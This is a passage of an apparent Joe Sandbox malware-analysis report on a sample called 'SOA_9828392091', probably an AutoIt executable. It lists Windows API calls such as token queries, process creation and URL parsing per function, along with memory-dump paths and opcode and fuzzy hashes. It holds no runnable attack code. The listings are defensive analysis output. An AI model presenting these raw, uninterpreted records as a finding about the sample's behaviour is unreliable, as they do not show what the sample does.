                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009705DD
                                      • FreeLibrary.KERNEL32(?), ref: 00970632
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                      • String ID:
                                      • API String ID: 3137044355-0
                                      • Opcode ID: bc2e1d0fdb8dae142284767c7fdb28b0e7b43033b92f5f0fcdea4d329cc8ae07
                                      • Instruction ID: e2b79dcbe441f7f56dd1db6eaecfebdd6bdec551fc146ca797f3d08289422662
                                      • Opcode Fuzzy Hash: bc2e1d0fdb8dae142284767c7fdb28b0e7b43033b92f5f0fcdea4d329cc8ae07
                                      • Instruction Fuzzy Hash: 6B218172A01209EFDB208F95DD98ADABBBCEFC0704F00CA69E51E92050E774EA55DF50
                                      APIs
                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00976733
                                      • _memset.LIBCMT ref: 00976754
                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009767A6
                                      • CloseHandle.KERNEL32(00000000), ref: 009767AF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                      • String ID:
                                      • API String ID: 1157408455-0
                                      • Opcode ID: 76261c8aeb3c96eace09f7b65f459f017602a104db769d22b8f38941e17bcfc3
                                      • Instruction ID: 3a45f21b7ee0bc6b717483e5b54409eb93f191c12a49f3b3b80c77ab11d4ad44
                                      • Opcode Fuzzy Hash: 76261c8aeb3c96eace09f7b65f459f017602a104db769d22b8f38941e17bcfc3
                                      • Instruction Fuzzy Hash: 6D11CA769013287AE72097A5AC4DFAFBABCEF44774F10429AF508E71D0D2744E808BA4
                                      APIs
                                        • Part of subcall function 0096AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0096AA79
                                        • Part of subcall function 0096AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0096AA83
                                        • Part of subcall function 0096AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0096AA92
                                        • Part of subcall function 0096AA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0096AA99
                                        • Part of subcall function 0096AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0096AAAF
                                      • GetLengthSid.ADVAPI32(?,00000000,0096ADE4,?,?), ref: 0096B21B
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0096B227
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0096B22E
                                      • CopySid.ADVAPI32(?,00000000,?), ref: 0096B247
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                                      • String ID:
                                      • API String ID: 259861997-0
                                      • Opcode ID: 7f39699aa1cf538aeb45eecb2efbd71840850b4d3d96a10e62a3dad90a6f36de
                                      • Instruction ID: 7498b0ecaf1e8ecbb5a6457b6ede5024205e9284a2d46b824e05be3d05d5e983
                                      • Opcode Fuzzy Hash: 7f39699aa1cf538aeb45eecb2efbd71840850b4d3d96a10e62a3dad90a6f36de
                                      • Instruction Fuzzy Hash: 5511C172A00205EFCB149F98DD95AAEB7EDFF94318F14802DE952E7210E731AE84DB10
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0096B498
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0096B4AA
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0096B4C0
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0096B4DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 519f16760d3cd5220a59614a8991d0fdf56726f371387e464b6d475da668b6f0
                                      • Instruction ID: 702332d9c972d921165f1e4619abf3ff50bae4a0ed7f201fb8ad5e5177c1c637
                                      • Opcode Fuzzy Hash: 519f16760d3cd5220a59614a8991d0fdf56726f371387e464b6d475da668b6f0
                                      • Instruction Fuzzy Hash: 5311487A900218FFDB11DFA8C981E9DBBB8FB48710F204091EA04B7290DB71AE51DB94
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00977352
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00977385
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0097739B
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009773A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      • Opcode ID: f673d315f440062d40248e885cb9a699b181b2fc57f13e4ddfbf03422fbc79f6
                                      • Instruction ID: 191eebb10305dd45ac96b0258b0ecf2d13f4406277ce9de0874f2fb77e013ac6
                                      • Opcode Fuzzy Hash: f673d315f440062d40248e885cb9a699b181b2fc57f13e4ddfbf03422fbc79f6
                                      • Instruction Fuzzy Hash: 30110872A2C204BFC7019BACDC05AEEBBAD9B45324F048315F935D3261E6748D00A7A0
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0094D1BA
                                      • GetStockObject.GDI32(00000011), ref: 0094D1CE
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0094D1D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: 716f97914950872761cb3e39ce2611f27ce946a579336816c16d1ad1656dace8
                                      • Instruction ID: e39f4e445c07b866e38d1c29cd134f4ac00753ceeccde7f0feb623432876665f
                                      • Opcode Fuzzy Hash: 716f97914950872761cb3e39ce2611f27ce946a579336816c16d1ad1656dace8
                                      • Instruction Fuzzy Hash: 3011ADB250A509BFEF0A4F909C50EEABB6DFF08364F040216FE1452050DB319C60EBA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                      • Instruction ID: ab6138ce22543f597623d313d7790ae4d0dacc5b1f93e2c9564e0dc333087662
                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                      • Instruction Fuzzy Hash: CC01443200014ABBCF175EC8DC168EE3F26BB58390F598855FA2859131D337CAB2EB81
                                      APIs
                                        • Part of subcall function 00957A0D: __getptd_noexit.LIBCMT ref: 00957A0E
                                      • __lock.LIBCMT ref: 0095748F
                                      • InterlockedDecrement.KERNEL32(?), ref: 009574AC
                                      • _free.LIBCMT ref: 009574BF
                                      • InterlockedIncrement.KERNEL32(016428F0), ref: 009574D7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 2704283638-0
                                      • Opcode ID: a015f99b9fecbf005e6a1e0de41fc7e2c53372257a0ed1e45c8befdb36b58a7a
                                      • Instruction ID: a2dae6b3c519d8aa6effbb89b3e61e6510f3154739190e309b38606ad8ee629a
                                      • Opcode Fuzzy Hash: a015f99b9fecbf005e6a1e0de41fc7e2c53372257a0ed1e45c8befdb36b58a7a
                                      • Instruction Fuzzy Hash: 4C01003290A661ABC722EFA7B90931DFB65BF44B22F154005FC14672A0CB206E08DFC2
                                      APIs
                                      • __lock.LIBCMT ref: 00957AD8
                                        • Part of subcall function 00957CF4: __mtinitlocknum.LIBCMT ref: 00957D06
                                        • Part of subcall function 00957CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00957D1F
                                      • InterlockedIncrement.KERNEL32(?), ref: 00957AE5
                                      • __lock.LIBCMT ref: 00957AF9
                                      • ___addlocaleref.LIBCMT ref: 00957B17
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                      • String ID:
                                      • API String ID: 1687444384-0
                                      • Opcode ID: 4adb2ec9a3cc0b769ee1f035fb9798d5be5ab2ed37099c76e674bcdc841f6dc2
                                      • Instruction ID: 17046e0c6a04e1131a36c82af0f11695f8db78a7a471c99d83258ad1cee0b14f
                                      • Opcode Fuzzy Hash: 4adb2ec9a3cc0b769ee1f035fb9798d5be5ab2ed37099c76e674bcdc841f6dc2
                                      • Instruction Fuzzy Hash: CD016171405700DFD721DFB6D905749F7F0AF90326F20494EE89A972A0CB70A648CB11
                                      APIs
                                      • _memset.LIBCMT ref: 0099E33D
                                      • _memset.LIBCMT ref: 0099E34C
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009F3D00,009F3D44), ref: 0099E37B
                                      • CloseHandle.KERNEL32 ref: 0099E38D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3277943733-0
                                      • Opcode ID: 140bf9e7fa462b06042314f96df712f04de833fb967dd17b0dcf176209da0b4e
                                      • Instruction ID: aed58c385f8a33b2a07b694ca36425f53b910d7dfca8386d46c82538d6203f7a
                                      • Opcode Fuzzy Hash: 140bf9e7fa462b06042314f96df712f04de833fb967dd17b0dcf176209da0b4e
                                      • Instruction Fuzzy Hash: 6BF05EF1564304BAE3105B65EC46F777EACDB04B55F008421BF08D61E2D3799E00E7A8
                                      APIs
                                        • Part of subcall function 0094AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0094AFE3
                                        • Part of subcall function 0094AF83: SelectObject.GDI32(?,00000000), ref: 0094AFF2
                                        • Part of subcall function 0094AF83: BeginPath.GDI32(?), ref: 0094B009
                                        • Part of subcall function 0094AF83: SelectObject.GDI32(?,00000000), ref: 0094B033
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0099EA8E
                                      • LineTo.GDI32(00000000,?,?), ref: 0099EA9B
                                      • EndPath.GDI32(00000000), ref: 0099EAAB
                                      • StrokePath.GDI32(00000000), ref: 0099EAB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: 957abd70242b83178aa10c1e5be2199d6d5afd0e5a3597719e61bd05826c12bd
                                      • Instruction ID: 68a4eca79c037af879b15191d5e51466de0790b2e3d215447dfcb54a65bf9496
                                      • Opcode Fuzzy Hash: 957abd70242b83178aa10c1e5be2199d6d5afd0e5a3597719e61bd05826c12bd
                                      • Instruction Fuzzy Hash: F9F0823105A25ABBDB12AF98AE0DFCE3F19AF16321F084201FE11610F187755551EBD9
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0096C84A
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0096C85D
                                      • GetCurrentThreadId.KERNEL32 ref: 0096C864
                                      • AttachThreadInput.USER32(00000000), ref: 0096C86B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: 28367e0e67f9cc480a1dd007a84d01d5e5c54bd9033b06c57cbf457cf3458149
                                      • Instruction ID: bb0951bc353091955242e96e7929fe9f6717168744aa19b99f652fdf6447a41a
                                      • Opcode Fuzzy Hash: 28367e0e67f9cc480a1dd007a84d01d5e5c54bd9033b06c57cbf457cf3458149
                                      • Instruction Fuzzy Hash: D7E065B1146228B6DB205B61DD0DEDB7F1CEF057B1F408115B50D95450D671C580DBE0
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 0096B0D6
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,0096AC9D), ref: 0096B0DD
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0096AC9D), ref: 0096B0EA
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,0096AC9D), ref: 0096B0F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: a3245fdd8c5ca72e1bb09beb059c3407aa5d86f0666df2e989512ff7bd263c40
                                      • Instruction ID: 81e9f2ce89edfda47de14268faa09c63ef369a0413ab8b759eb30e81d7331551
                                      • Opcode Fuzzy Hash: a3245fdd8c5ca72e1bb09beb059c3407aa5d86f0666df2e989512ff7bd263c40
                                      • Instruction Fuzzy Hash: 85E086366562129BD7202FB15E0CB473BACEF557B5F018928F741D6040FB348441DB60
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0094B496
                                      • SetTextColor.GDI32(?,000000FF), ref: 0094B4A0
                                      • SetBkMode.GDI32(?,00000001), ref: 0094B4B5
                                      • GetStockObject.GDI32(00000005), ref: 0094B4BD
                                      • GetWindowDC.USER32(?,00000000), ref: 009ADE2B
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 009ADE38
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 009ADE51
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 009ADE6A
                                      • GetPixel.GDI32(00000000,?,?), ref: 009ADE8A
                                      • ReleaseDC.USER32(?,00000000), ref: 009ADE95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: 28ca1d5cd955cf56173f599aeeece579f954fb3745d4447bdca2372b231fc841
                                      • Instruction ID: 7f2214f1ce124eac20fe9c9345e49694e53539db5e5a8440a63ee6261f8542f9
                                      • Opcode Fuzzy Hash: 28ca1d5cd955cf56173f599aeeece579f954fb3745d4447bdca2372b231fc841
                                      • Instruction Fuzzy Hash: 75E06D31119240AAEB251B68AC09BD83B15AB1233AF10C326F66A980E1D7B18580EB11
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 6d649b43dc68b588f2770b17f8ffa1162d040ee5c331e3ebcb60246937d1b5c5
                                      • Instruction ID: 6f8ddfd993af751cb3322fff456f1f353bf93a8dd2b71959308cbdbf5991b8a9
                                      • Opcode Fuzzy Hash: 6d649b43dc68b588f2770b17f8ffa1162d040ee5c331e3ebcb60246937d1b5c5
                                      • Instruction Fuzzy Hash: 00E04FB5515204EFDB005F70C948A6D7BA4FB4C361F11C916FC5A87311EB789840AB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 27cd7bd5ad84dfea0fcac9dc4bffaa1a9c9a149dbf4ddbd667424314c384a67c
                                      • Instruction ID: 92a16225f86019e4326a2809af428d634890a000acc7e9fe1b0db6059821cd52
                                      • Opcode Fuzzy Hash: 27cd7bd5ad84dfea0fcac9dc4bffaa1a9c9a149dbf4ddbd667424314c384a67c
                                      • Instruction Fuzzy Hash: E8E046B9915200EFDB005F70C988A2D7BA8FB4C361F118A1AFD5A8B310EB789800AB50
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0096DEAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 3565006973-3941886329
                                      • Opcode ID: 9d4aa3af933c45991cda28836f0f93caf17cb9fd4ce98e5751e61e738dbffeea
                                      • Instruction ID: 3ffd228925cb30e43b8a8c24d6026e72c33c6426ae24e6e8b879d264f3d4b57a
                                      • Opcode Fuzzy Hash: 9d4aa3af933c45991cda28836f0f93caf17cb9fd4ce98e5751e61e738dbffeea
                                      • Instruction Fuzzy Hash: 80914774A01701AFDB24DF64C894B6AB7F9BF88710F20886DF95ACB691DB71E841CB50
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 0094BCDA
                                      • GlobalMemoryStatusEx.KERNEL32 ref: 0094BCF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: e4653c450ae09c89bb6c671b2b112d0f7e76f259debf18d9150471b44c148b25
                                      • Instruction ID: b1eea6a9de4cbf4938c0150b1bda5cebc9ada0ee9d0b3d4432c5dcdcd8a8ae40
                                      • Opcode Fuzzy Hash: e4653c450ae09c89bb6c671b2b112d0f7e76f259debf18d9150471b44c148b25
                                      • Instruction Fuzzy Hash: D6512871418748ABE320AF14D885FAFBBECFBD4354F81485EF1C8450A6DB7089A89766
                                      APIs
                                        • Part of subcall function 009344ED: __fread_nolock.LIBCMT ref: 0093450B
                                      • _wcscmp.LIBCMT ref: 0097C65D
                                      • _wcscmp.LIBCMT ref: 0097C670
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscmp$__fread_nolock
                                      • String ID: FILE
                                      • API String ID: 4029003684-3121273764
                                      • Opcode ID: 0631f224e3b6263d1578cb098ab04677b19ec524ad78a834e2102372bd2a2e6c
                                      • Instruction ID: ccf149ec91eefd0e13a376317a41dd5a32ad34a686b60d14eda24caa79c9051a
                                      • Opcode Fuzzy Hash: 0631f224e3b6263d1578cb098ab04677b19ec524ad78a834e2102372bd2a2e6c
                                      • Instruction Fuzzy Hash: 0641D572A0020ABBDF20ABA4DC85FEF77B9AF89714F014479F605EB191D671AA048B51
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0099A85A
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0099A86F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: ea2b30f5d40af33b6640332129723b7914d1887c00036be53da75034bcd55aed
                                      • Instruction ID: 0c8ddb9ec38a19189e6c383a6c51c3d8b59f27d88d27a32c9a9d9a5bfe9d2daa
                                      • Opcode Fuzzy Hash: ea2b30f5d40af33b6640332129723b7914d1887c00036be53da75034bcd55aed
                                      • Instruction Fuzzy Hash: 0941E774E012099FDF14CFA9D881BEA7BB9FB08314F14016AE905EB351D770A941CFA1
                                      APIs
                                      • _memset.LIBCMT ref: 00985190
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009851C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CrackInternet_memset
                                      • String ID: |
                                      • API String ID: 1413715105-2343686810
                                      • Opcode ID: a4491e04aecb5d36da182fe74ce42f2e3881eeed0ff15f17ef0316ac6825a9e2
                                      • Instruction ID: 8ea65e7b32c04414cf566237e63c3aecb326da3a1329d78a12ef0749875fb550
